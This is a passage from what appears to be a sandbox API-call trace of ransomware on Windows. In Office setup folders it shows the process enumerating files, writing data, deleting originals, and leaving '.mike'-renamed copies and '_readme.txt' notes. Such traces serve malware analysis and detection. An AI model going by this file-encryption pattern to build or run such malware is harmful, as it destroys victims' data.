ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.854] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.859] WriteFile (in: hFile=0x288, lpBuffer=0x2238988*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2238988*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML", dwFileAttributes=0x80) returned 1 [0052.860] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0052.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.866] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0052.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8cd0bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cd0bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8caaa60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8caaa60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cd0bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.XML.mike", cAlternateFileName="POWERP~1.MIK")) returned 1 [0052.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cd0bc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cd0bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cd0bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cd0bc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cd0bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cd0bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cd0bc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cd0bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cd0bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.869] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.869] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.869] CoTaskMemFree (pv=0x502980) [0052.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60fd8f0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbe2e8f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.XML", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0052.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c227b0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.872] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML", dwFileAttributes=0x80) returned 1 [0052.876] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0052.879] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.884] WriteFile (in: hFile=0x288, lpBuffer=0x2286cd4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2286cd4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.884] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0052.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe8cf6d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cf6d20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cf6d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cf6d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cf6d20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b40, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.XML.mike", cAlternateFileName="PRJPRO~1.MIK")) returned 1 [0052.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cf6d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cf6d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8cf6d20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4350, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cf6d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cf6d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d1ce80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cf6d20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8cf6d20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d1ce80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.887] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.887] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.887] CoTaskMemFree (pv=0x502980) [0052.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5b2ebe0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf551ba0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.XML", cAlternateFileName="PROJEC~1.XML")) returned 1 [0052.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bc88d0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.888] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML", dwFileAttributes=0x80) returned 1 [0052.894] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0052.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.900] WriteFile (in: hFile=0x288, lpBuffer=0x22aa3bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22aa3bc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.901] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0052.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe8d1ce80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d1ce80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d1ce80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d1ce80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d1ce80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.XML.mike", cAlternateFileName="PROJEC~1.MIK")) returned 1 [0052.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d1ce80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d1ce80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d1ce80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d1ce80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d1ce80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d1ce80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d1ce80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.903] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.903] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.903] CoTaskMemFree (pv=0x502980) [0052.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01be3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0052.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML", dwFileAttributes=0x80) returned 1 [0052.909] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0052.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8d42fe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d42fe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d42fe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0052.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d42fe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d42fe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d42fe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d42fe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d42fe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.911] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.911] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.911] CoTaskMemFree (pv=0x502980) [0052.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0052.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.913] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 